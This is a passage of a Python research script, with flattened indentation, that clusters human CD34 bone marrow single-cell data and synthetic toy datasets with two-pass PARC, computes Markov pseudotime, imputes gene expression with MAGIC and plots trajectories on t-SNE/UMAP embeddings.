nover_labels = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/Nover_Cor_PredFine_notLogNorm.csv')[
'x'].values.tolist()
nover_labels = [dict_abb[i] for i in nover_labels]
for i in list(set(nover_labels)):
print('the population of ', i, 'is ', nover_labels.count(i))
parc53_labels = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/Nover_Cor_Parc53_set1.csv')[
'x'].values.tolist()
parclabels_all = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/parclabels_all_set1.csv')[
'parc'].values.tolist()
parc_dict_nover = {}
for i, c in enumerate(parc53_labels):
parc_dict_nover[i] = dict_abb[c]
parclabels_all = [parc_dict_nover[ll] for ll in parclabels_all]
# print('all', len(parclabels_all))
ad = sc.read(
'/home/shobi/Trajectory/Datasets/HumanCD34/human_cd34_bm_rep1.h5ad')
# 5780 cells x 14651 genes Human Replicate 1. Male african american, 38 years
print('h5ad ad size', ad)
colors = pd.Series(ad.uns['cluster_colors'])
colors['10'] = '#0b128f'
ct_colors = pd.Series(ad.uns['ct_colors'])
list_var_names = ad.var_names
# print(list_var_names)
ad.uns['iroot'] = np.flatnonzero(ad.obs_names == ad.obs['palantir_pseudotime'].idxmin())[0]
print('iroot', np.flatnonzero(ad.obs_names == ad.obs['palantir_pseudotime'].idxmin())[0])
tsne = pd.DataFrame(ad.obsm['tsne'], index=ad.obs_names, columns=['x', 'y'])
tsnem = ad.obsm['tsne']
palantir_tsne_df = pd.DataFrame(tsnem)
palantir_tsne_df.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/palantir_tsne.csv')
revised_clus = ad.obs['clusters'].values.tolist().copy()
loc_DCs = [i for i in range(5780) if ad.obs['clusters'].values.tolist()[i] == '7']
for loc_i in loc_DCs:
if ad.obsm['palantir_branch_probs'][loc_i, 5] > ad.obsm['palantir_branch_probs'][
loc_i, 2]: # if prob that cDC > pDC, then relabel as cDC
revised_clus[loc_i] = '10'
revised_clus = [int(i) for i in revised_clus]
# magic_df = ad.obsm['MAGIC_imputed_data']
# ad.X: Filtered, normalized and log transformed count matrix
# ad.raw: Filtered raw count matrix
# print('before extra filtering' ,ad.shape)
# sc.pp.filter_genes(ad, min_cells=10)
# print('after extra filtering', ad.shape)
adata_counts = sc.AnnData(
ad.X) # slalom_human())#(ad.X) # ad.X is filtered, lognormalized,scaled// ad.raw.X is the filtered but not pre-processed
adata_counts.obs_names = ad.obs_names
adata_counts.var_names = ad.var_names
# sc.pp.recipe_zheng17(adata_counts, n_top_genes=1000, log=True) #using this or the .X scaled version is pretty much the same.
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
marker = ['x', '+', (5, 0), '>', 'o', (5, 2)]
import colorcet as cc
if run_palantir_func == True:
run_palantir_func_human34(ad, ncomps, knn, tsne, revised_clus, start_cell='c4823')
# tsnem = TSNE().fit_transform(adata_counts.obsm['X_pca'])
'''
f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True)
line = np.linspace(0, 1, len(set(revised_clus)))
for color, group in zip(line, set(revised_clus)):
where = np.where(np.array(revised_clus) == group)[0]
ax1.scatter(tsnem[where, 0], tsnem[where, 1], label=group, c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend()
ax1.set_title('Palantir Phenograph Labels')
import colorcet as cc
marker = ['x', '+', (5, 0), '>', 'o', (5, 2)]
line_nover = np.linspace(0, 1, len(set(nover_labels)))
col_i = 0
for color, group in zip(line_nover, set(nover_labels)):
where = np.where(np.array(nover_labels) == group)[0]
marker_x = marker[random.randint(0, 5)]
# ax2.scatter(tsnem[where, 0],tsnem[where, 1], label=group, c=plt.cm.nipy_spectral(color), marker = marker_x, alpha=0.5)
ax2.scatter(tsnem[where, 0], tsnem[where, 1], label=group, c=cc.glasbey_dark[col_i], marker=marker_x,
alpha=0.5)
col_i = col_i + 1
ax2.legend(fontsize=6)
ax2.set_title('Novershtern Corr. Labels')
line = np.linspace(0, 1, len(set(parclabels_all)))
col_i = 0
for color, group in zip(line, set(parclabels_all)):
where = np.where(np.array(parclabels_all) == group)[0]
ax3.scatter(tsnem[where, 0], tsnem[where, 1], label=group, c=cc.glasbey_dark[col_i], alpha=0.5)
col_i = col_i + 1
ax3.legend()
ax3.set_title('Parc53 Nover Labels')
# plt.show()
'''
'''
plt.figure(figsize=[5, 5])
plt.title('palantir, ncomps = ' + str(ncomps) + ' knn' + str(knn))
for group in set(revised_clus):
loc_group = np.where(np.asarray(revised_clus) == group)[0]
plt.scatter(tsnem[loc_group, 0], tsnem[loc_group, 1], s=5, color=colors[group], label=group)
ax = plt.gca()
ax.set_axis_off()
ax.legend(fontsize=6)
'''
gene_list = ['ITGAX']#['GATA1', 'GATA2', 'ITGA2B', 'CSF1R', 'MPO', 'CD79B', 'SPI1', 'IRF8', 'CD34', 'IL3RA', 'ITGAX', 'IGHD',
#'CD27', 'CD14', 'CD22', 'ITGAM', 'CLC', 'MS4A3', 'FCGR3A', 'CSF1R']
for gene_name in gene_list:# 'GATA2',
loc_gata = np.where(np.asarray(ad.var_names) == gene_name)[0][0]
print('gene name', gene_name, loc_gata)
#print('xpca',norm_df['X_pca'])
true_label = nover_labels # revised_clus
print('p0 random seed', p0_random_seed)
#df_temp_write = pd.DataFrame(adata_counts.obsm['X_pca'][:, 0:200])
#df_temp_write.to_csv("/home/shobi/Trajectory/Datasets/HumanCD34/Human_CD34_200PCA.csv")
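# Coarse pass (p0): cluster on the top `ncomps` PCs. too_big_factor=0.4 (larger than
# in the refined pass below) yields a coarser clustering, and root_user=4823
# corresponds to the Palantir start cell 'c4823' used elsewhere in this script.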
p0 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.4,
pseudotime=True, path="/home/shobi/Trajectory/Datasets/HumanCD34/",
root_user=4823, dataset='humanCD34', preserve_disconnected=True, random_seed=p0_random_seed, do_magic_bool=True, is_coarse = True) # *.4 root=1,
p0.run_PARC()
super_labels = p0.labels
df_ = pd.DataFrame(ad.X)
df_.columns = [i for i in ad.var_names]
print('start magic')
gene_list_magic = ['IL3RA', 'IRF8', 'GATA1', 'GATA2', 'ITGA2B', 'MPO', 'CD79B','SPI1', 'CD34','CSF1R','ITGAX']
df_magic = p0.do_magic(df_,magic_steps=3, gene_list=gene_list_magic )
print('end magic', df_magic.shape)
print('super labels', set(super_labels))
ad.obs['parc0_label'] = [str(i) for i in super_labels]
magic_ad = ad.obsm['MAGIC_imputed_data']
magic_ad = sc.AnnData(magic_ad)
magic_ad.obs_names = ad.obs_names
magic_ad.var_names = ad.var_names
magic_ad.obs['parc0_label'] = [str(i) for i in super_labels]
marker_genes = {"ERY": ['GATA1', 'GATA2', 'ITGA2B'], "BCell": ['IGHD', 'CD22'],
"DC": ['IRF8', 'IL3RA', 'IRF4', 'CSF2RA','ITGAX'],
"MONO": ['CD14', 'SPI1', 'MPO', 'IL12RB1', 'IL13RA1', 'C3AR1', 'FCGR3A'], 'HSC': ['CD34']}
print('make the p0 matrix plot')
sc.pl.matrixplot(magic_ad, marker_genes, groupby='parc0_label')
'''
sc.tl.rank_genes_groups(ad, groupby='parc0_label', use_raw=True,
method='wilcoxon', n_genes=10) # compute differential expression
sc.pl.rank_genes_groups_heatmap(ad, n_genes=10, groupby="parc0_label", show_gene_labels=True, use_raw=False)
sc.pl.rank_genes_groups_tracksplot(ad, groupby='parc0_label', n_genes = 3) # plot the result
print('show the matrix plot')
'''
super_edges = p0.edgelist_maxout # p0.edgelist
super_pt = p0.scaled_hitting_times # pseudotime pt
p = hnswlib.Index(space='l2', dim=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[1])
p.init_index(max_elements=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[0], ef_construction=200, M=16)
p.add_items(adata_counts.obsm['X_pca'][:, 0:ncomps])
p.set_ef(50)
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster
for tsi in p0.terminal_clusters:
loc_i = np.where(super_labels == tsi)[0]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
#print(labelsq[0])
tsi_list.append(labelsq[0][0])
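# Refined pass (p1): re-cluster with a small too_big_factor and hand over the coarse
# labels, node degrees, terminal single cells (tsi_list) and terminal clusters from
# p0 so that the fine-grained graph inherits the super-cluster terminal structure.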
p1 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.05,
path="/home/shobi/Trajectory/Datasets/HumanCD34/", pseudotime=True,
super_cluster_labels=super_labels, super_node_degree_list=p0.node_degree_list,
super_terminal_cells=tsi_list, root_user=4823,
x_lazy=0.99, alpha_teleport=0.99, dataset='humanCD34', preserve_disconnected=True,
super_terminal_clusters=p0.terminal_clusters, is_coarse = False, full_neighbor_array=p0.full_neighbor_array, ig_full_graph=p0.ig_full_graph,csr_array_pruned=p0.csr_array_pruned) # *.4super_terminal_cells = tsi_list #3root=1,
p1.run_PARC()
labels = p1.labels
ad.obs['parc1_label'] = [str(i) for i in labels]
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster
for tsi in p1.revised_super_terminal_clusters:
loc_i = np.where(super_labels == tsi)[0]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
print(labelsq[0])
tsi_list.append(labelsq[0][0])
'''
sc.tl.rank_genes_groups(ad, groupby='parc1_label', use_raw=True,
method='wilcoxon', n_genes=10) # compute differential expression
sc.pl.matrixplot(ad, marker_genes, groupby='parc1_label', use_raw=False)
sc.pl.rank_genes_groups_heatmap(ad, n_genes=3, groupby="parc1_label", show_gene_labels=True, use_raw=False)
'''
label_df = pd.DataFrame(labels, columns=['parc'])
# label_df.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/parclabels.csv', index=False)
gene_ids = adata_counts.var_names
obs = ad.raw.X.toarray()
print('shape obs', obs.shape)
obs = pd.DataFrame(obs, columns=gene_ids)
# obs['parc']=p1.labels
obs['louvain'] = revised_clus
# obs_average = obs.groupby('parc', as_index=True).mean()
obs_average = obs.groupby('louvain', as_index=True).mean()
print(obs_average.head())
# obs_average.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/louvain_palantir_average.csv', index=False)
ad_obs = sc.AnnData(obs_average)
ad_obs.var_names = gene_ids
ad_obs.obs['parc'] = [i for i in range(len(set(revised_clus)))] # p1.labels instead of revised_clus
# sc.write('/home/shobi/Trajectory/Datasets/HumanCD34/louvain_palantir_average.h5ad',ad_obs)
# fig_0, ax_0 = plt.subplots()
loaded_magic_df = pd.read_csv('/home/shobi/Trajectory/Datasets/HumanCD34/MAGIC_palantir_knn30ncomp100_subset.csv')
loaded_magic_df.head()
for gene_name in ['ITGA2B','IL3RA','ITGAX','IRF8']:#['GATA1', 'GATA2', 'ITGA2B', 'MPO', 'CD79B','IRF8','SPI1', 'CD34','CSF1R','IL3RA','IRF4', 'CSF2RA','ITGAX']:
print('gene name', gene_name)
#DC markers https://www.cell.com/pb-assets/products/nucleus/nucleus-phagocytes/rnd-systems-dendritic-cells-br.pdf
gene_name_dict = {'GATA1': 'GATA1', 'GATA2': 'GATA2', 'ITGA2B': 'CD41 (Mega)', 'MPO':'MPO (Mono)', 'CD79B':'CD79B (B)','IRF8':'IRF8 (DC)', 'SPI1':'PU.1','CD34': 'CD34','CSF1R':'CSF1R (pDC. Up then Down in cDC)','IL3RA':'CD123 (pDC)','IRF4': 'IRF4 (pDC)', 'ITGAX':'ITGAX (cDCs)','CSF2RA':'CSF2RA (cDC)'}
#loc_gata = np.where(np.asarray(ad.var_names) == gene_name)[0][0]
#magic_ad = ad.obsm['MAGIC_imputed_data'][:, loc_gata]
#magic_ad=loaded_magic_df[gene_name]
subset_ = df_magic[gene_name].values
print(subset_.shape)
#print('shapes of magic_ad 1 and 2', magic_ad.shape,subset_.shape)
#p1.get_gene_expression(magic_ad,title_gene = gene_name_dict[gene_name])
p1.get_gene_expression(subset_, title_gene = gene_name_dict[gene_name]+'VIA MAGIC')
print('start tsne')
n_downsample = 4000
if len(labels) > n_downsample:
# idx = np.random.randint(len(labels), size=4000)
np.random.seed(2357)
idx = np.random.choice(a=np.arange(0, len(labels)), size=5780, replace=False, p=None)
super_labels = np.asarray(super_labels)[idx]
labels = list(np.asarray(labels)[idx])
print('labels p1', len(labels), set(labels))
true_label = list(np.asarray(true_label)[idx])
sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov)[idx])
#graph_hnsw = p0.knngraph_visual()
embedding = tsnem[idx, :] # TSNE().fit_transform(adata_counts.obsm['X_pca'][idx, :])
# embedding = umap.UMAP().fit_transform(adata_counts.obsm['X_pca'][idx, 0:20])
print('size of downsampled embedding', embedding.shape)
else:
# embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][:,0:15])
# print('tsne input size', adata_counts.obsm['X_pca'].shape)
embedding = tsnem # umap.UMAP().fit_transform(adata_counts.obsm['X_pca'][:,0:20])
idx = np.random.randint(len(labels), size=len(labels))
print('end tsne')
knn_hnsw, ci_list = sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx)
super_clus_ds_PCA_loc = sc_loc_ofsuperCluster_PCAspace( p0, p1, idx)
draw_trajectory_gams(embedding,super_clus_ds_PCA_loc, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p1.revised_super_terminal_clusters,
sub_terminal_clusters=p1.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
# final_super_terminal=p0.terminal clusters
'''
draw_trajectory_dimred(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
plt.show()
'''
num_group = len(set(true_label))
line = np.linspace(0, 1, num_group)
lineP0 = np.linspace(0, 1, len(set(p0.labels)))
lineP1 = np.linspace(0, 1, len(set(p1.labels)))
# find the single-cell which is nearest to the average-location of a terminal cluster - for just the sub-set of downsampled points in the corresponding PCA-space
new_tsi_list = []
# find the single-cell which is nearest to the average-location of a terminal cluster
# TODO make a knn in the downsampled PCA-space
X_ds = adata_counts.obsm['X_pca'][:, 0:ncomps][idx]
p_ds = hnswlib.Index(space='l2', dim=ncomps)
p_ds.init_index(max_elements=X_ds.shape[0], ef_construction=200, M=16)
p_ds.add_items(X_ds)
p_ds.set_ef(50)
for tsi_item in tsi_list:
labelsq, distances = p_ds.knn_query(adata_counts.obsm['X_pca'][:, 0:ncomps][tsi_item, :], k=1)
new_tsi_list.append(labelsq[0][0])
new_tsi_list = super_clus_ds_PCA_loc
# for old_tsi_i in tsi_list:
# temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
# labelsq, distances = p1.knn_struct.query(.knn_query(temp, k=1)
# print(labelsq[0])
# tsi_list.append(labelsq[0][0])
f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True)
ff, (ax11, ax22) = plt.subplots(1, 2, sharey=True)
col_i = 0
for color, group in zip(line, set(true_label)):
marker_x = marker[random.randint(0, 5)]
where = np.where(np.asarray(true_label) == group)[0]
# ax1.scatter(embedding[where, 0], embedding[where, 1], label=group, c=plt.cm.jet(color))
ax1.scatter(embedding[where, 0], embedding[where, 1], label=group, c=cc.glasbey_dark[col_i], marker=marker_x,
alpha=0.5)
col_i = col_i + 1
ax1.legend(fontsize=6)
ax1.set_title('true labels')
for color, group in zip(lineP0, set(p0.labels)):
where = np.where(super_labels == group)[0]
ax11.scatter(embedding[where, 0], embedding[where, 1], label=group,
c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax11.legend(fontsize=6)
ax11.set_title('p0 labels')
for color, group in zip(lineP1, set(p1.labels)):
where = np.where(labels == group)[0]
ax22.scatter(embedding[where, 0], embedding[where, 1], label=group,
c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax22.legend(fontsize=6)
ax22.set_title('p1 labels')
ax3.set_title("Markov Sim PT ncomps:" + str(ncomps) + '. knn:' + str(knn))
ax3.scatter(embedding[:, 0], embedding[:, 1], c=sc_pt_markov, cmap='viridis_r')
ax2.set_title("terminal clus from P0 super clus:" + str(ncomps) + '. knn:' + str(knn)+ 'randseed' +str( p0_random_seed))
ax2.scatter(embedding[:, 0], embedding[:, 1], c=sc_pt_markov, cmap='viridis_r')
jj = 0
for ti, ti_sub in zip(p1.revised_super_terminal_clusters, p1.terminal_clusters): # p0.terminal_clusters:
loc_i = np.where(super_labels == ti)[0]
val_pt = [sc_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 0) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
labelsq, distances = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]), k=1)
x = embedding[labelsq[0], 0]
y = embedding[labelsq[0], 1]
# ax2.scatter(np.mean(x), np.mean(y), label='ts' + str(ti)+'M'+str(maj), c='red', s=15)
# ax2.scatter(x, y, label='TS' + str(ti), c='red', s=10)
# ax3.scatter(x, y, label='TS' + str(ti), c='red', s=10)
print(super_clus_ds_PCA_loc[jj], 'super_clus_ds_PCA_loc[jj]', embedding[super_clus_ds_PCA_loc[jj],:])
ax2.scatter(embedding[super_clus_ds_PCA_loc[ti], 0], embedding[super_clus_ds_PCA_loc[ti], 1], label='TS' + str(ti), c='pink', s=18) # PCs HNSW
# ax3.scatter(embedding[new_tsi_list[jj], 0], embedding[new_tsi_list[jj], 1], label='TS' + str(p1.labels[tsi_list[jj]]), c='pink',s=18)
ax2.text(embedding[super_clus_ds_PCA_loc[ti], 0]+0.05, embedding[super_clus_ds_PCA_loc[ti], 1]+ 0.05, 'TS' + str(ti), color='black', zorder=3)
# ax3.text(np.mean(x) + 0.05, np.mean(y) + 0.05, 'TS' + str(ti), color='black', zorder=3)
ax2.legend(fontsize=6)
ax3.scatter(embedding[super_clus_ds_PCA_loc[ti], 0], embedding[super_clus_ds_PCA_loc[ti], 1],
label='TS' + str(ti), c='pink', s=18)
ax3.text(embedding[super_clus_ds_PCA_loc[ti], 0] + 0.05, embedding[super_clus_ds_PCA_loc[ti], 1] + 0.05,
'TS' + str(ti_sub), color='black', zorder=3)
jj = jj + 1
jj = 0
for ti in p1.terminal_clusters:
print('terminal ti', ti)
jj = jj + 1
draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, p0.full_graph_shortpath, idx, adata_counts.obsm['X_pca'][:, 0:ncomps])
plt.show()
def main_Toy(ncomps = 100, knn = 30,random_seed=42):
dataset = "Toy3" # ""Toy1" # GermlineLi #Toy1
print('dataset, ncomps, knn, seed', dataset, ncomps,knn, random_seed)
## Dataset Germline Li https://zenodo.org/record/1443566#.XZlhEkEzZ5y
if dataset == "GermlineLine":
df_expression_ids = pd.read_csv("/home/shobi/Trajectory/Code/Rcode/germline_human_female_weeks_li.csv", 'rt',
delimiter=",")
print(df_expression_ids.shape)
# print(df_expression_ids[['cell_id',"week","ACTG2","STK31"]])[10:12]
df_counts = pd.read_csv("/home/shobi/Trajectory/Code/Rcode/germline_human_female_weeks_li_filteredcounts.csv",
'rt', delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Code/Rcode/germline_human_female_weeks_li_labels.csv", 'rt',
delimiter=",")
# print(df_counts.shape, df_counts.head() ,df_ids.shape)
# X_counts = df_counts.values
# print(X_counts.shape)
# varnames = pd.Categorical(list(df_counts.columns))
adata_counts = sc.AnnData(df_counts, obs=df_ids)
print(adata_counts.obs)
sc.pp.filter_cells(adata_counts, min_counts=1)
print(adata_counts.n_obs)
sc.pp.filter_genes(adata_counts, min_counts=1) # only consider genes with more than 1 count
print(adata_counts.X.shape)
sc.pp.normalize_per_cell( # normalize with total UMI count per cell
adata_counts, key_n_counts='n_counts_all')
print(adata_counts.X.shape, len(list(adata_counts.var_names)))
filter_result = sc.pp.filter_genes_dispersion( # select highly-variable genes
adata_counts.X, flavor='cell_ranger', n_top_genes=1000, log=False)
print(adata_counts.X.shape, len(list(adata_counts.var_names))) # , list(adata_counts.var_names))
adata_counts = adata_counts[:, filter_result.gene_subset]
print(adata_counts.X.shape, len(list(adata_counts.var_names))) # ,list(adata_counts.var_names))
# subset the genes
sc.pp.normalize_per_cell(adata_counts) # renormalize after filtering
sc.pp.log1p(adata_counts) # log transform: adata_counts.X = log(adata_counts.X + 1)
sc.pp.scale(adata_counts) # scale to unit variance and shift to zero mean
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=20)
true_label = list(adata_counts.obs['week'])
sc.pp.neighbors(adata_counts, n_neighbors=10, n_pcs=20)
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='gender_week', legend_loc='right margin', palette='jet')
## Dataset Paul15 https://scanpy-tutorials.readthedocs.io/en/latest/paga-paul15.html
if dataset == 'Paul15':
root_user = "8Mk"
adata_counts = sc.datasets.paul15()
sc.pp.recipe_zheng17(adata_counts)
sc.tl.pca(adata_counts, svd_solver='arpack')
true_label = list(adata_counts.obs['paul15_clusters']) # PAUL
adata_counts.obs['group_id'] = true_label
# sc.pp.neighbors(adata_counts, n_neighbors=10)
# sc.tl.draw_graph(adata_counts)
# sc.pl.draw_graph(adata_counts, color=['paul15_clusters', 'Cma1'], legend_loc='on data')
if dataset.startswith('Toy'):
root_user = 'M1' # "T1_M1", "T2_M1"] #"T1_M1"
if dataset == "Toy1":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy1/toy_bifurcating_M4_n2000d1000.csv",
'rt', delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy1/toy_bifurcating_M4_n2000d1000_ids.csv",
'rt', delimiter=",")
if dataset == "Toy2":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy2/toy_multifurcating_n1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy2/toy_multifurcating_n1000_ids.csv", 'rt',
delimiter=",")
if dataset == "Toy3":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000_ids.csv", 'rt',
delimiter=",")
start_cell = 'C107'
if dataset == "ToyCyclic":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/ToyCyclic/ToyCyclic_M5_n3000d1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/ToyCyclic/ToyCyclic_M5_n3000d1000_ids.csv", 'rt',
delimiter=",")
if dataset == "Toy4":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy4/toy_disconnected_M9_n1000d1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy4/toy_disconnected_M9_n1000d1000_ids.csv", 'rt',
delimiter=",")
df_ids['cell_id_num'] = [int(s[1::]) for s in df_ids['cell_id']]
print("shape", df_counts.shape, df_ids.shape)
df_counts = df_counts.drop('Unnamed: 0', axis=1)
df_ids = df_ids.sort_values(by=['cell_id_num'])
df_ids = df_ids.reset_index(drop=True)
df_ids.to_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000_ids_sorted.csv")
true_label = df_ids['group_id']
adata_counts = sc.AnnData(df_counts, obs=df_ids)
# sc.pp.recipe_zheng17(adata_counts, n_top_genes=20) not helpful for toy data
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
'''
print(np.flatnonzero(adata_counts.obs['group_id'] == 'M1')[0]) #'T1_M1'
adata_counts.uns['iroot'] = np.flatnonzero(adata_counts.obs['group_id'] == 'M1')[0]
sc.pp.neighbors(adata_counts, n_neighbors=knn, n_pcs=ncomps)#4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data') #force-directed layout
start_dfmap = time.time()
sc.tl.diffmap(adata_counts, n_comps=ncomps)
print('time taken to get diffmap given knn', time.time() - start_dfmap)
sc.pp.neighbors(adata_counts, n_neighbors=knn, use_rep='X_diffmap')#4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data')
sc.tl.leiden(adata_counts, resolution=1.0)
sc.tl.paga(adata_counts, groups='leiden')
#sc.pl.paga(adata_counts, color=['louvain','group_id'])
sc.tl.dpt(adata_counts, n_dcs=ncomps)
sc.pl.paga(adata_counts, color=['leiden', 'group_id', 'dpt_pseudotime'], title=['leiden (knn:'+str(knn)+' ncomps:'+str(ncomps)+')', 'group_id (ncomps:'+str(ncomps)+')','pseudotime (ncomps:'+str(ncomps)+')'])
#X = df_counts.values
'''
print(palantir.__file__) #location of palantir source code
#counts = palantir.io.from_csv("/home/shobi/Trajectory/Datasets/Toy4/toy_disconnected_M9_n1000d1000.csv")
counts = palantir.io.from_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000.csv")
#counts = palantir.io.from_csv("/home/shobi/Trajectory/Datasets/ToyCyclic/ToyCyclic_M5_n3000d1000.csv")
print('counts',counts)
str_true_label = true_label.tolist()
str_true_label = [(i[1:]) for i in str_true_label]
str_true_label = pd.Series(str_true_label, index=counts.index)
norm_df = counts#palantir.preprocess.normalize_counts(counts)
pca_projections, _ = palantir.utils.run_pca(norm_df, n_components=ncomps)
dm_res = palantir.utils.run_diffusion_maps(pca_projections, n_components=ncomps, knn=knn)
ms_data = palantir.utils.determine_multiscale_space(dm_res) #n_eigs is determined using eigengap
tsne = palantir.utils.run_tsne(ms_data)
palantir.plot.plot_cell_clusters(tsne, str_true_label)
#C108 for M12 connected' #M8n1000d1000 start - c107 #c1001 for bifurc n2000d1000 #disconnected n1000 c108, "C1 for M10 connected" # c10 for bifurcating_m4_n2000d1000
print('ms data', ms_data)
pr_res = palantir.core.run_palantir(ms_data, start_cell, num_waypoints=500,knn=knn)
palantir.plot.plot_palantir_results(pr_res, tsne, n_knn = knn, n_comps=ncomps)
plt.show()
# clusters = palantir.utils.determine_cell_clusters(pca_projections)
'''
from sklearn.decomposition import PCA
pca = PCA(n_components=ncomps)
pc = pca.fit_transform(df_counts)
'''
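# Same two-pass PARC workflow as for the human data: a coarse pass (p0) finds
# super-clusters and terminal states, then a refined pass (p1) is seeded with them.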
p0 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.3,
pseudotime=True, path="/home/shobi/Trajectory/Datasets/" + dataset + "/",
root_user=root_user, preserve_disconnected=True, dataset='toy',random_seed=random_seed) # *.4 root=2,
p0.run_PARC()
super_labels = p0.labels
super_edges = p0.edgelist
super_pt = p0.scaled_hitting_times # pseudotime pt
# 0.05 for p1 toobig
p = hnswlib.Index(space='l2', dim=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[1])
p.init_index(max_elements=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[0], ef_construction=200, M=16)
p.add_items(adata_counts.obsm['X_pca'][:, 0:ncomps])
p.set_ef(50)
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster in PCA space (
for tsi in p0.terminal_clusters:
loc_i = np.where(np.asarray(p0.labels) == tsi)[0]
val_pt = [p0.single_cell_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 50) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
print(labelsq[0])
tsi_list.append(labelsq[0][0])
p1 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=.15, dist_std_local=1, knn=knn,
too_big_factor=0.05,
path="/home/shobi/Trajectory/Datasets/" + dataset + "/", pseudotime=True,
super_cluster_labels=super_labels, super_node_degree_list=p0.node_degree_list,
super_terminal_cells=tsi_list, root_user=root_user,
x_lazy=0.99, alpha_teleport=0.99, preserve_disconnected=True, dataset='toy',
super_terminal_clusters=p0.terminal_clusters, random_seed=random_seed) #root=1,
# in the case of TOY DATA: P1 WORKS MUCH BETTER WHEN ONLY USING SUPER_TERMINAL_CLUS... O/W need to omit pruning
p1.run_PARC()
labels = p1.labels
# p1 = PARC(adata_counts.obsm['X_pca'], true_label, jac_std_global=1, knn=5, too_big_factor=0.05, anndata= adata_counts, small_pop=2)
# p1.run_PARC()
# labels = p1.labels
print('start tsne')
n_downsample = 500
if len(labels) > n_downsample:
# idx = np.random.randint(len(labels), size=900)
np.random.seed(2357)
idx = np.random.choice(a=np.arange(0, len(labels)), size=990, replace=False, p=None)
print('len idx', len(idx))
super_labels = np.asarray(super_labels)[idx]
labels = list(np.asarray(labels)[idx])
true_label = list(np.asarray(true_label)[idx])
sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov)[idx])
graph = p0.knngraph_visual(adata_counts.obsm['X_pca'][idx, :], downsampled=True)
embedding = p0.run_umap_hnsw(adata_counts.obsm['X_pca'][idx, :], graph)
#embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][idx, :])
print('tsne downsampled size', embedding.shape)
else:
